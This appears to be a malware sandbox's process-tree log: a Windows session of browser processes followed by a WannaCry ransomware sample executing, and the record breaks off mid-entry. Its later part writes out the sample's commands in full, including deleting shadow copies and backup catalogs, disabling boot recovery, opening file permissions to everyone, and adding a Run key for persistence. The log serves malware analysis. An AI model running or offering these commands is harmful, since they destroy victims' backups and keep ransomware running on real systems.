"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=4632 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:1
2⤵
PID:2144

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4000 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:8
2⤵
PID:2708

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5028 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:8
2⤵
- Modifies registry class
PID:3488

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4996 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:8
2⤵
PID:3392

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=4484 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:1
2⤵
PID:244

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=5476 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:1
2⤵
PID:4524

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=216 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:1
2⤵
PID:3044

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5256 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:2
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:236

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=5484 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:1
2⤵
PID:3088

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3380 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:8
2⤵
PID:4624

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5308 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:8
2⤵
PID:5044

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5540 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:8
2⤵
PID:1656

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=5404 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:1
2⤵
PID:1476

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3260 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:8
2⤵
PID:2532

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=3252 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:1
2⤵
PID:5072

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=2792 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:1
2⤵
PID:4992

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=3764 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:1
2⤵
PID:4900

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=4352 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:1
2⤵
PID:1976

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --mojo-platform-channel-handle=4600 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:1
2⤵
PID:4496

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --mojo-platform-channel-handle=5656 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:1
2⤵
PID:4044

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --mojo-platform-channel-handle=5928 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:1
2⤵
PID:1300

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --mojo-platform-channel-handle=5972 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:1
2⤵
PID:4568

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --mojo-platform-channel-handle=6076 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:1
2⤵
PID:1532

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --mojo-platform-channel-handle=6376 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:1
2⤵
PID:824

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --mojo-platform-channel-handle=6528 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:1
2⤵
PID:4220

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --mojo-platform-channel-handle=6676 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:1
2⤵
PID:1656

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --mojo-platform-channel-handle=6064 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:1
2⤵
PID:3568

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --mojo-platform-channel-handle=7188 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:1
2⤵
PID:3396

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --mojo-platform-channel-handle=7240 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:1
2⤵
PID:936

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --mojo-platform-channel-handle=7504 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:1
2⤵
PID:4508

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --mojo-platform-channel-handle=7680 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:1
2⤵
PID:568

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --mojo-platform-channel-handle=7808 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:1
2⤵
PID:5188

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --mojo-platform-channel-handle=7152 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:1
2⤵
PID:5288

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --mojo-platform-channel-handle=8168 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:1
2⤵
PID:5560

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --mojo-platform-channel-handle=8300 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:1
2⤵
PID:5568

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --mojo-platform-channel-handle=8460 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:1
2⤵
PID:5704

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --mojo-platform-channel-handle=8284 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:1
2⤵
PID:5820

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --mojo-platform-channel-handle=8612 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:1
2⤵
PID:5880

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --mojo-platform-channel-handle=8868 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:1
2⤵
PID:5888

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --mojo-platform-channel-handle=8864 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:1
2⤵
PID:5896

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --mojo-platform-channel-handle=9168 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:1
2⤵
PID:5940

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --mojo-platform-channel-handle=9316 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:1
2⤵
PID:6048

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --mojo-platform-channel-handle=9300 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:1
2⤵
PID:6056

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --mojo-platform-channel-handle=9644 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:1
2⤵
PID:6124

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --mojo-platform-channel-handle=9424 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:1
2⤵
PID:5432

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --mojo-platform-channel-handle=9020 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:1
2⤵
PID:5476

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --mojo-platform-channel-handle=4056 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:1
2⤵
PID:5532

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --mojo-platform-channel-handle=7028 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:1
2⤵
PID:1108

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5348 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:8
2⤵
PID:1928

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4240 --field-trial-handle=1824,i,16844541077201086695,15312469341375111443,131072 /prefetch:8
2⤵
- NTFS ADS
PID:4080

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:820

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004C0 0x00000000000004E4
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3328

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5588

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4980

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\README.md"
2⤵
PID:3392

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\README.md
3⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3248

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3248.0.1613674144\1730440253" -parentBuildID 20230214051806 -prefsHandle 1764 -prefMapHandle 1760 -prefsLen 22074 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0865e459-cdfb-43ac-b827-552f68d95c03} 3248 "\\.\pipe\gecko-crash-server-pipe.3248" 1852 1ad4500d458 gpu
4⤵
PID:2844

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3248.1.1279078182\1130481268" -parentBuildID 20230214051806 -prefsHandle 2412 -prefMapHandle 2408 -prefsLen 22925 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {084ded13-d49d-45b9-b7dc-41e06d2964f3} 3248 "\\.\pipe\gecko-crash-server-pipe.3248" 2440 1ad3838c758 socket
4⤵
- Checks processor information in registry
PID:5520

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3248.2.190899775\246744429" -childID 1 -isForBrowser -prefsHandle 2952 -prefMapHandle 3172 -prefsLen 22963 -prefMapSize 235121 -jsInitHandle 936 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d16b39b6-8c7a-4869-af30-1b143568421c} 3248 "\\.\pipe\gecko-crash-server-pipe.3248" 3416 1ad47f6fa58 tab
4⤵
PID:2768

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3248.3.1336601768\1543800764" -childID 2 -isForBrowser -prefsHandle 3588 -prefMapHandle 3584 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 936 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c387f04e-5cdf-452f-bd31-1f458d478aba} 3248 "\\.\pipe\gecko-crash-server-pipe.3248" 3596 1ad4a8f3158 tab
4⤵
PID:5376

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3248.4.101749447\1778531474" -childID 3 -isForBrowser -prefsHandle 5212 -prefMapHandle 5208 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 936 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {66c97a96-378b-457b-85d1-edfdb8dcee47} 3248 "\\.\pipe\gecko-crash-server-pipe.3248" 5168 1ad3837eb58 tab
4⤵
PID:5660

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3248.5.21191911\597709242" -childID 4 -isForBrowser -prefsHandle 5364 -prefMapHandle 5372 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 936 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {00354edf-8c8d-440e-b7e7-0d6d82e756a2} 3248 "\\.\pipe\gecko-crash-server-pipe.3248" 5356 1ad4d725358 tab
4⤵
PID:5528

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3248.6.1021049657\1359559573" -childID 5 -isForBrowser -prefsHandle 5548 -prefMapHandle 5552 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 936 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f2167aee-5dc4-4894-96d7-425e04ed78fd} 3248 "\\.\pipe\gecko-crash-server-pipe.3248" 5540 1ad4d726258 tab
4⤵
PID:5288

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"
1⤵
- Drops startup file
- Sets desktop wallpaper using registry
PID:2672

C:\Windows\SysWOW64\attrib.exe
attrib +h .
2⤵
- Views/modifies file attributes
PID:1560

C:\Windows\SysWOW64\icacls.exe
icacls . /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:5656

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:4904

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 257061720037565.bat
2⤵
PID:5800

C:\Windows\SysWOW64\cscript.exe
cscript.exe //nologo m.vbs
3⤵
PID:5992

C:\Windows\SysWOW64\attrib.exe
attrib +h +s F:\$RECYCLE
2⤵
- Views/modifies file attributes
PID:3268

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
@[email protected] co
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3368

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exe
TaskData\Tor\taskhsvc.exe
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:2844

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c start /b @[email protected] vs
2⤵
PID:1180

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
@[email protected] vs
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5716

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
4⤵
PID:4180

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
5⤵
PID:2304

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:4484

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
2⤵
- Executes dropped EXE
PID:2140

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:5292

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "obpfgsjmrmyjcf936" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\tasksche.exe\"" /f
2⤵
PID:3680

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "obpfgsjmrmyjcf936" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\tasksche.exe\"" /f
3⤵
- Adds Run key to start application
- Modifies registry key
PID:4888

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:1912

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
2⤵
- Executes dropped EXE
PID:4664

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5044

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
2⤵
- Executes dropped EXE
PID:4072

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2988

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:4016

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
2⤵
- Executes dropped EXE
PID:5200

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5928

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:2592

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
2⤵
- Executes dropped EXE
PID:3616

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1052

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:1940

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
